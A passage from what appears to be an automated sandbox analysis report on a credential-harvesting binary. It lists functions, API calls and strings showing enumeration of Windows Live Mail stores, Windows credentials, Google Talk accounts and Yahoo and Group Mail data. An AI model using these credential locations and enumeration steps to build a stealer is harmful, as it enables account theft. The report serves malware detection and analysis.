                    • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                    • strlen.MSVCRT ref: 004443DB
                    • _strcmpi.MSVCRT ref: 00444401
                    Strings
                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                    • \Microsoft\Windows Mail, xrefs: 00444329
                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                    • Store Root, xrefs: 004443A5
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                    • API String ID: 832325562-2578778931
                    • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                    • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                    Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                    APIs
                    • memset.MSVCRT ref: 0040F567
                    • memset.MSVCRT ref: 0040F57F
                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • memcpy.MSVCRT ref: 0040F652
                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                    • String ID:
                    • API String ID: 2012582556-3916222277
                    • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                    • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                    Function 0040F96C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 338 40f96c-40f991 call 4070ae 341 40f993 338->341 342 40f998-40f9ab call 4045db 338->342 341->342 345 40f9b1-40f9bd 342->345 346 40faee-40fafd call 404656 342->346 347 40f9d1 345->347 348 40f9bf-40f9cf CredEnumerateW 345->348 350 40f9d3-40f9d5 347->350 348->350 350->346 352 40f9db-40f9e5 350->352 353 40fae6 352->353 354 40f9eb 352->354 353->346 355 40f9f0-40f9fb 354->355 356 40fa01-40fa04 355->356 357 40fad3-40fae0 355->357 356->357 358 40fa0a-40fa0d 356->358 357->353 357->355 358->357 359 40fa13-40fa3d memset WideCharToMultiByte 358->359 359->357 360 40fa43-40fa59 _strnicmp 359->360 360->357 361 40fa5b-40fa86 WideCharToMultiByte 360->361 362 40fa88-40faa6 WideCharToMultiByte 361->362 363 40faad-40fab4 361->363 362->363 364 40fab6-40facb 363->364 365 40facd-40fad0 363->365 364->357 365->357
                    APIs
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040F9CB
                    • memset.MSVCRT ref: 0040FA1E
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                    • _strnicmp.MSVCRT ref: 0040FA4F
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$CredEnumerateVersion_strnicmpmemset
                    • String ID: WindowsLive:name=*$windowslive:name=
                    • API String ID: 4107456500-3589380929
                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                    Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 367 4037ca-40381c memset * 2 call 444551 370 4038e2-4038e5 367->370 371 403822-403882 call 4021b6 call 406f06 * 2 strchr 367->371 378 403884-403895 _mbscpy 371->378 379 403897-4038a2 strlen 371->379 380 4038bf-4038dd _mbscpy call 4023e5 378->380 379->380 381 4038a4-4038bc sprintf 379->381 380->370 381->380
                    APIs
                    • memset.MSVCRT ref: 004037EB
                    • memset.MSVCRT ref: 004037FF
                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    • strchr.MSVCRT ref: 0040386E
                    • _mbscpy.MSVCRT ref: 0040388B
                    • strlen.MSVCRT ref: 00403897
                    • sprintf.MSVCRT ref: 004038B7
                    • _mbscpy.MSVCRT ref: 004038CD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                    • String ID: %s@yahoo.com
                    • API String ID: 317221925-3288273942
                    • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                    • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                    Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 383 4034e4-403544 memset * 2 call 410b1e 386 403580-403582 383->386 387 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 383->387 387->386
                    APIs
                    • memset.MSVCRT ref: 00403504
                    • memset.MSVCRT ref: 0040351A
                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                    • _mbscpy.MSVCRT ref: 00403555
                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                    • _mbscat.MSVCRT ref: 0040356D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscatmemset$Close_mbscpystrlen
                    • String ID: InstallPath$Software\Group Mail$fb.dat
                    • API String ID: 3071782539-966475738
                    • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                    • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                    Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 40ccd7-40cd06 ??2@YAPAXI@Z 393 40cd08-40cd0d 392->393 394 40cd0f 392->394 395 40cd11-40cd24 ??2@YAPAXI@Z 393->395 394->395 396 40cd26-40cd2d call 404025 395->396 397 40cd2f 395->397 399 40cd31-40cd57 396->399 397->399 401 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 399->401 402 40cd59-40cd60 DeleteObject 399->402 402->401
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                    • String ID:
                    • API String ID: 2054149589-0
                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                    Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                    • memset.MSVCRT ref: 00408620
                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                    • memset.MSVCRT ref: 00408671
                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                    Strings
                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                    • String ID: Software\Google\Google Talk\Accounts
                    • API String ID: 1366857005-1079885057
                    • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                    • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                    Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 446 40ba74 439->446 447 40ba6f-40ba72 439->447 440->433 440->434 441 40baa0-40bab3 call 407e30 448 40bab5-40bac1 441->448 449 40bafa-40bb09 SetCursor 441->449 450 40ba75-40ba76 call 40b5e5 446->450 447->450 451 40bac3-40bace 448->451 452 40bad8-40baf7 qsort 448->452 450->440 451->452 452->449 456->441 457->441 458->441 459->441 460->441
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor_mbsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 882979914-1578091866
                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                    Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                    • memset.MSVCRT ref: 00410E10
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • _mbscpy.MSVCRT ref: 00410E87
                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 889583718-2036018995
                    • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                    • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                    Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                    Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004109F7
                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                      • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                    • memset.MSVCRT ref: 00410A32
                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                    • String ID:
                    • API String ID: 3143880245-0
                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                    Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                    Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                    Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFontIndirect_mbscpymemset
                    • String ID: Arial
                    • API String ID: 3853255127-493054409
                    • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                    • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                    • _strcmpi.MSVCRT ref: 0040CEC3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: strlen$_strcmpimemset
                    • String ID: /stext
                    • API String ID: 520177685-3817206916
                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                    Function 0044B435 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                    • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                    • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                    • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressFreeLoadProc
                    • String ID:
                    • API String ID: 145871493-0
                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile$StringWrite_itoamemset
                    • String ID:
                    • API String ID: 4165544737-0
                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                    Download Yara Rule
                    APIs
